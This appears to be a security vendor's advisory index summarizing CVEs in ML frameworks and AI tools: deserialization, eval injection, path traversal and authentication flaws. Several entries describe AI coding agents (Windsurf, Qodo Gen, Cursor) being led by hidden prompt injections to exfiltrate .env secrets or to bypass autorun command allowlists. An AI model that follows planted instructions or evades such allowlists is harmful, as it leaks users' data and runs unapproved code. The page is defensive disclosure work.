HiddenLayer AI Security Advisory

HiddenLayer's AI Security Research team consists of multidisciplinary cybersecurity experts and data scientists dedicated to raising awareness about threats to machine learning and artificial intelligence systems.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
This is some text inside of a div block.
lorem

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

Heading

lorem

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

This is some text inside of a div block.
CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

November 2025
CVE-2025-62353

October 17, 2025

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

Windsurf

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

October 2025
SAI-ADV-2025-012

October 17, 2025

Data Exfiltration from Tool-Assisted Setup

Windsurf

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

October 2025
CVE-2025-62353

October 17, 2025

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

Windsurf

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

October 2025
CVE-2025-62356

October 17, 2025

Symlink Bypass in File System MCP Server Leading to Arbitrary Filesystem Read

Qodo Gen

A symlink bypass vulnerability exists inside of Qodo Gen’s built-in File System MCP server, allowing any file on the filesystem to be read by the model. The code that validates allowed paths can be found in the file: ai/codium/mcp/ideTools/FileSystem.java, but this validation can be bypassed if a symbolic link exists within the project.

October 2025
SAI-ADV-2025-013

October 17, 2025

Data Exfiltration through Web Search Tool

Qodo Gen

The Web Search functionality within the Qodo Gen JetBrains plugin is set up as a built-in MCP server through ai/codium/CustomAgentKt.java. It does not ask user permission when called, meaning that an attacker can enumerate code project files on a victim’s machine and call the Web Search tool to exfiltrate their contents via a request to an external server.

October 2025
CVE-2025-49655

October 17, 2025

Unsafe deserialization function leads to code execution when loading a Keras model

Keras

An arbitrary code execution vulnerability exists in the TorchModuleWrapper class due to its usage of torch.load() within the from_config method. The method deserializes model data with the weights_only parameter set to False, which causes Torch to fall back on Python’s pickle module for deserialization. Since pickle is known to be unsafe and capable of executing arbitrary code during the deserialization process, a maliciously crafted model file could allow an attacker to execute arbitrary commands.

October 2025
SAI-ADV-2025-011

July 31, 2025

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

When in autorun mode, Cursor checks commands against those that have been specifically blocked or allowed. The function that performs this check has a bypass in its logic that can be exploited by an attacker to craft a command that will be executed regardless of whether or not it is on the block-list or allow-list.

July 2025
CVE-2025-49653

June 9, 2025

Exposure of sensitive Information allows account takeover

BackendAI

By default, BackendAI’s agent will write to /home/config/ when starting an interactive session. These files are readable by the default user. However, they contain sensitive information such as the user’s mail, access key, and session settings.

June 2025
CVE-2025-49652

June 9, 2025

Improper access control arbitrary allows account creation

BackendAI

BackendAI doesn’t enable account creation. However, an exposed endpoint allows anyone to sign up with a user-privileged account.

June 2025
CVE-2025-49651

June 9, 2025

Missing Authorization for Interactive Sessions

BackendAI

Interactive sessions do not verify whether a user is authorized and doesn’t have authentication. These missing verifications allow attackers to take over the sessions and access the data (models, code, etc.), alter the data or results, and stop the user from accessing their session.

June 2025
SAI-ADV-2025-001

April 3, 2025

Unsafe Deserialization in DeepSpeed utility function when loading the model file

PyTorch Lightning

If a user attempts to convert distributed checkpoints into a single consolidated file using DeepSpeed, a pytorch file with the naming convention *_optim_states.pt is used. This pytorch file returns a state which specifies the model state file, also located in the directory. This can contain a maliciously crafted data.pkl file, which, when deserialized as part of this process, may lead to arbitrary code being executed on the system.

April 2025
SAI-ADV-2024-005

December 16, 2024

keras.models.load_model when scanning .pb files leads to arbitrary code execution

Bosch AI

If a user scans a malicious keras model in the protobuf format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the arbitrary code inside of the Keras model will run, executing arbitrary code.

December 2024
SAI-ADV-2024-004

December 16, 2024

keras.models.load_model when scanning .h5 files leads to arbitrary code execution

Bosch AI

If a user scans a malicious keras model in the H5 format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the arbitrary code inside of the Keras model will run, executing arbitrary code.

December 2024
CVE-2024-0129

October 24, 2024

Unsafe extraction of NeMo archive leading to arbitrary file write

NVIDIA NeMo

An attacker can craft a malicious model containing a path traversal and share it with a victim. If the victim uses an Nvidia NeMo version prior to r2.0.0rc0 and loads the malicious model, arbitrary files may be written to disk. This can result in code execution and data tampering.

October 2024
CVE-2024-45858

September 18, 2024

Eval on XML parameters allows arbitrary code execution when loading RAIL file

Guardrails

An attacker can craft an XML file with Python code contained within a ‘validators’ attribute. This code must be wrapped in braces to work, i.e. `{Python_code}`. This can then be passed to a victim user as a Guardrails file, and upon loading it, the Python code contained within the braces is passed into an eval function, which will execute the Python code contained within.

September 2024
CVE-2024-45856

September 12, 2024

Web UI renders javascript code in ML Engine name leading to XSS

MindsDB

An attacker authenticated to a MindsDB instance can create an ML Engine, database, project, or upload a dataset within the UI and give it a name (or value in the dataset) containing javascript code that will render when the items are enumerated within the UI.

September 2024
CVE-2024-45855

September 12, 2024

Pickle Load on inhouse BYOM model finetune leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘finetune’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

September 2024
CVE-2024-45854

September 12, 2024

Pickle Load on inhouse BYOM model describe query leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘describe’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

September 2024
CVE-2024-45853

September 12, 2024

Pickle Load on inhouse BYOM model prediction leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘predict’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse’.

September 2024
CVE-2024-45852

September 12, 2024

Pickle Load on BYOM model load leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via a ‘predict’ or ‘describe’ query, executing the arbitrary code on the server.

September 2024
CVE-2024-45851

September 12, 2024

Eval on query parameters allows arbitrary code execution in SharePoint integration list item creation

MindsDB

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list item, where the value given for the ‘fields’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45850

September 12, 2024

Eval on query parameters allows arbitrary code execution in SharePoint integration site column creation

MindsDB

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a site column, where the value given for the ‘text’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45849

September 12, 2024

Eval on query parameters allows arbitrary code execution in SharePoint integration list creation

MindsDB

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list, where the value given for the ‘list’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45848

September 12, 2024

Eval on query parameters allows arbitrary code execution in ChromaDB integration

MindsDB

An attacker authenticated to a MindsDB instance with the ChromaDB integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the ChromaDB engine and running an ‘INSERT’ query against it, where the value given for ‘metadata’ would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45847

September 12, 2024

Eval on query parameters allows arbitrary code execution in Vector Database integrations

MindsDB

An attacker authenticated to a MindsDB instance with any one of several integrations installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the specified integration engine and running an ‘UPDATE’ query against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run any arbitrary Python code contained within the value given in the ‘SET embeddings =’ part of the query.

September 2024
CVE-2024-45846

September 12, 2024

Eval on query parameters allows arbitrary code execution in Weaviate integration

MindsDB

An attacker authenticated to a MindsDB instance with the Weaviate integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the Weaviate engine and running a ‘SELECT WHERE’ clause against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input, but it will run any arbitrary Python code contained within the value given in the ‘WHERE embeddings =’ part of the clause.

September 2024
CVE-2024-45857

September 12, 2024

Unsafe deserialization in Datalab leads to arbitrary code execution

Cleanlab

An attacker can place a malicious file called datalabs.pkl within a directory and send that directory to a victim user. When the victim user loads the directory with Datalabs.load, the datalabs.pkl within it is deserialized and any arbitrary code contained within it is executed.

September 2024
CVE-2024-27321

September 12, 2024

Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class

Autolabel

An attacker can craft a CSV file containing Python code in one of the values. This code must be wrapped in brackets to work i.e. []. The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a multilabel classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which will execute the Python code contained within.

September 2024
CVE-2024-27320

September 12, 2024

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

Autolabel

An attacker can craft a CSV file containing Python code in one of the values. This code must be wrapped in brackets to work i.e. []. The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which will execute the Python code contained within.

September 2024
SAI-ADV-2024-003

August 30, 2024

Safe_eval and safe_exec allows for arbitrary code execution

LlamaIndex

Execution of arbitrary code can be achieved via the safe_eval and safe_exec functions of the llama-index-experimental/llama_index/experimental/exec_utils.py Python file. The functions allow the user to run untrusted code via an eval or exec function while only permitting whitelisted functions. However, an attacker can leverage the whitelisted pandas.read_pickle function or other 3rd party library functions to achieve arbitrary code execution. This can be exploited in the Pandas Query Engine.

August 2024
SAI-ADV-2024-002

August 30, 2024

Exec on untrusted LLM output leading to arbitrary code execution on Evaporate integration

LlamaIndex

The safe_eval and safe_exec functions are intended to allow the user to run untrusted code in an eval or exec function while disallowing dangerous functions. However, an attacker can use 3rd party library functions to get arbitrary code execution.

August 2024
CVE-2024-37066

July 19, 2024

Crafted WiFI network name (SSID) leads to arbitrary command injection

Wyze Cam V4

A command injection vulnerability exists in Wyze Cam V4 firmware versions up to and including 4.52.4.9887. An attacker within Bluetooth range of the camera can leverage this command to execute arbitrary commands as root during the camera setup process.

July 2024
SAI-ADV-2024-001

July 11, 2024

Deserialization of untrusted data leading to arbitrary code execution

Tensorflow Probability

Execution of arbitrary code can be achieved through the deserialization process in the tensorflow_probability/python/layers/distribution_layer.py file within the function _deserialize_function. An attacker can inject a malicious pickle object into an HDF5 formatted model file, which will be deserialized via pickle when the model is loaded, executing the malicious code on the victim machine. An attacker can achieve this by injecting a pickle object into the DistributionLambda layer of the model under the make_distribution_fn key.

July 2024
CVE-2024-37053

June 4, 2024

Pickle Load on Sklearn Model Load Leading to Code Execution Copy

MLflow

An attacker can inject a malicious pickle object into a scikit-learn model file and log it to the MLflow tracking server via the API. When a victim user calls the mlflow.sklearn.load_model function on the model, the pickle file is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37058

June 4, 2024

Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object during the process of creating a Langhchain model and log the model to the MLflow tracking server via the API using the model.langchain.log_model function. When a victim user calls the mlflow.langchain.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37061

June 4, 2024

Remote Code Execution on Local System via MLproject YAML File

MLflow

An attacker can package an MLflow Project where the main entrypoint command set in the MLproject file contains malicious code (or an operating system appropriate command), and share it with a victim. When the victim runs the project, the command will be executed on their system.

June 2024
CVE-2024-37060

June 4, 2024

Pickle Load on Recipe Run Leading to Code Execution

MLflow

An attacker can create an MLProject Recipe containing a malicious pickle file and a Python file that calls BaseCard.load on it and share it with a victim. When the victim runs mlflow run against the Recipe directory, the pickle file will be deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37059

June 4, 2024

Cloudpickle Load on PyTorch Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a Pytorch model file and log it to the MLflow tracking server via the API using the model.pytorch.log_model function. When a victim user calls the mlflow.pytorch.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37058

June 4, 2024

Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution

MLflow

A deserialization vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.

June 2024
CVE-2024-37057

June 4, 2024

Cloudpickle Load on TensorFlow Keras Model Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a Tensorflow model file and log it to the MLflow tracking server via the API using the model.tensorflow.log_model function. When a victim user calls the mlflow.tensorflow.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37056

June 4, 2024

Cloudpickle Load on LightGBM SciKit Learn Model Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a LightGBM scikit-learn model file and log it to the MLflow tracking server via the API using the model.lightgbm.log_model function. When a victim user calls the mlflow.lightgbm.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37055

June 4, 2024

Pickle Load on Pmdarima Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a pmdarima model file and log it to the MLflow tracking server via the API using the model.pmdarima.log_model function. When a victim user calls the mlflow.pmdarima.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37054

June 4, 2024

Cloudpickle Load on PyFunc Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a model file and log it to the MLflow tracking server via the API using the model.pyfunc.log_model function. When a victim user calls the mlflow.pyfunc.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37052

June 4, 2024

Cloudpickle Load on Sklearn Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a scikit-learn model file and log it to the MLflow tracking server via the API. When a victim user calls the mlflow.sklearn.load_model function on the model, the pickle file is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37064

June 4, 2024

Pickle Load in Read Pandas Utility Function

YData-profiling

An attacker can create a maliciously crafted pandas dataset and share it with a victim. Once a victim loads the dataset in Ydata-profiling, malicious code will execute on their system.

June 2024
CVE-2024-37063

June 4, 2024

XSS Injection in HTML Profile Report Generation

YData-profiling

An attacker can create a maliciously crafted Ydata-profiling html report containing malicious code. Once a victim browses to the report and views it, malicious code will execute in their browser.

June 2024
CVE-2024-37062

June 4, 2024

Pickle Load in Serialized Profile Load

YData-profiling

An attacker can create a maliciously crafted Ydata-profiling report containing malicious code and share it with a victim. When the victim loads the report, the code will be executed on their system.

June 2024
CVE-2024-37065

June 4, 2024

Model Deserialization Leads to Code Execution

Skops

An attacker can create a malicious crafted model containing an OperatorFuncNode, and share it with a victim. If the victim is using Python 3.11 or later and loads the malicious model arbitrary code will execute on their system.

June 2024
CVE-2024-34073

April 30, 2024

Command Injection in CaptureDependency Function

AWS Sagemaker

A command injection vulnerability exists inside the capture_dependencies function of the AWS Sagemakers util file. If a user used the util function when creating their code, an attacker can leverage the vulnerability to run arbitrary commands on a system running the code by injecting a system command into the string passed to the function.

April 2024
CVE-2024-34072

April 30, 2024

Command Injection in Capture Dependency

AWS Sagemaker

An attacker can inject a malicious pickle object into a numpy file and share it with a victim user. When the victim uses the NumpyDeserializer.deserialize function of the base_deserializers python file to load it, the allow_pickle optional argument can be set to ‘false’ and passed to np.load, leading to the safe loading of the file. However, by default the optional parameter was set to true, so if this is not specifically changed by the victim, this will result in the loading and execution of the malicious pickle object.

April 2024
CVE-2024-27322

April 1, 2024

R-bitrary Code Execution Through Deserialization Vulnerability

R

An attacker could leverage the R Data Serialization format to insert arbitrary code into an RDS formatted file, or an R package as an RDX or RDB component, which will be executed when referenced or called with ReadRDS. This is because of the lazy evaluation process used in the unserialize function of the R programming language.

April 2024
CVE-2024-27319

February 23, 2024

Out of bounds read due to lack of string termination in assert

ONNX

An attacker can create a malicious onnx model which fails an assert statement in a way that an error string equal to or greater than 2048 characters is printed out and share it with a victim. When the victim tries to load the onnx model a string is created which leaks program memory.

February 2024
CVE-2024-27318

February 23, 2024

Path sanitization bypass leading to arbitrary read

ONNX

An attacker can create a malicious onnx model containing paths to externally located tensors and share it with a victim. When the victim tries to load the externally located tensors a directory traversal attack can occur leading to an arbitrary read on a victim’s system leading to information disclosure.

February 2024
CVE-2024-24593

February 6, 2024

Web Server Renders User HTML Leading to XSS

ClearML

An attacker can provide a URL rather than uploading an image to the Debug Samples tab of an Experiment. If the URL has the extension .html, the web server retrieves the HTML page, which is assumed to contain trusted data. The HTML is marked as safe and rendered on the page, resulting in arbitrary JavaScript running in any user’s browser when they view the samples tab.

February 2024
CVE-2024-24593

February 6, 2024

Cross-Site Request Forgery in ClearML Server

ClearML

An attacker can craft a malicious web page that triggers a CSRF when visited. When a user browses to the malicious web page a request is sent which can allow an attacker to fully compromise a user’s account.

February 2024
CVE-2024-24592

February 6, 2024

Improper Auth Leading to Arbitrary Read-Write Access

ClearML

An attacker can, due to lack of authentication, arbitrarily upload, delete, modify, or download files on the fileserver, even if the files belong to another user.

February 2024
CVE-2024-24591

February 6, 2024

Path Traversal on File Download

ClearML

An attacker can upload or modify a dataset containing a link pointing to an arbitrary file and a target file path. When a user interacts with this dataset, such as when using the Dataset.squash method, the file is written to the target path on the user’s system.

February 2024
CVE-2024-24590

February 6, 2024

Pickle Load on Artifact Get

ClearML

An attacker can create a pickle file containing arbitrary code and upload it as an artifact to a Project via the API. When a victim user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.

February 2024
CVE-2024-24595

February 1, 2024

Credentials Stored in Plaintext in MongoDB Instance

ClearML

An attacker could retrieve ClearML user information and credentials using a tool such as mongosh if they have access to the server. This is because the open-source version of the ClearML Server MongoDB instance lacks access control and stores user information and credentials in plaintext.

February 2024

Understand AI Security, Clearly Defined

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.